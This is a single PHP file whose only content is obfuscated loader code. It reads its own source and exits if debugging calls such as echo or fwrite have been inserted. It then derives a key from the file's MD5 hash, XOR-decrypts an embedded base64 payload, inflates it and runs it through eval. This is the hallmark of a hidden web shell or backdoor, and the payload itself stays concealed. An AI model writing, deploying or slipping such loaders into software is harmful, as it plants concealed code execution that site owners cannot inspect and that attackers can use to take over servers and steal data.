<?php
$zccjabgh="3275c0824b830607b079a7bb7726bd63";
$jspgbewio="0a0404065a060c0b065b5c00065707045a080f5c555654060107055255020255";
$hacagxwom="vGTyWdoGIMWnjkETTxCWtM4sqvVZ/GQMPhSOcPDig5BKFGWltBKj16THHxaPKNvu+6YUqgiuLaluUXLC9vpUuA2NyGlga39w6NVSihAzUYTtEJR8t5R5/CGlZ+stlQvSlT2xRFGCTHx5adIZgcNhQxjjox906goWRZPr7RQqFKv/BgFdtvRJvHADzHdfibVh2Q6lNGVjyUK6EfwjzKFQ/YswPPeLHpzPI86p/i5fyTITRNtSBfWEygPXdb0/mGZsgmfoji1j7ASmwWqEQQ+TosDjfYZdGiKCTGrL2KnwUJXaank9bq3QAIvm5htUCTpa3Yq9oE7UOgswZtzjU2sLOOU2DwwUqYIJsewGgn+91hm+zM5LKrn+pM8aXCmvebX5jpUKCoDyrkcTEHc2/Z2qYMh/oClVIfOkeOY1vV0/ZIij0tSCCqlxqcsBGTKRiYy1ZByLfAR39wA0/KCstfFVzW+B14weYdfGBkWBMLvOSNOcmfHTbphthRnrQZPdXMQQapBiLgNzYw05oBBw14mXrY220GQjW+6M5fFxLNaFJw==";
$qxymwsjh=file_get_contents(__FILE__);
$iomtgdep=str_replace($hacagxwom,"",$qxymwsjh);
if(strpos($iomtgdep,"ec"."ho")!==false||strpos($iomtgdep,"pr"."int")!==false||strpos($iomtgdep,"var_"."dump")!==false||strpos($iomtgdep,"file_put_"."contents")!==false||strpos($iomtgdep,"fw"."rite")!==false){die();}
$nfzebtqqj=str_replace(array($zccjabgh,$jspgbewio),array("SP_3c251ec1","KP_f68fab47"),$qxymwsjh);
$qrbger=md5($nfzebtqqj);
$irbpomzbn=hex2bin($jspgbewio);
$iyruygxmceic="";
$nwpjdwhvkvmi=strlen($qrbger);
for($erntxjq=0;$erntxjq<$nwpjdwhvkvmi;$erntxjq++){
    $iyruygxmceic.=chr(ord($irbpomzbn[$erntxjq])^ord($qrbger[$erntxjq]));
}
$xfmisgeiybiz=base64_decode($hacagxwom);
$qffjhxzjezq=strlen($xfmisgeiybiz);
$vvavtcmr="";
$fhnhgqoelark=strlen($iyruygxmceic);
for($erntxjq=0;$erntxjq<$qffjhxzjezq;$erntxjq++){
    $vvavtcmr.=$xfmisgeiybiz[$erntxjq]^$iyruygxmceic[$erntxjq%$fhnhgqoelark];
}
$pgveleek="gz"."in"."fl"."ate";
eval($pgveleek($vvavtcmr));
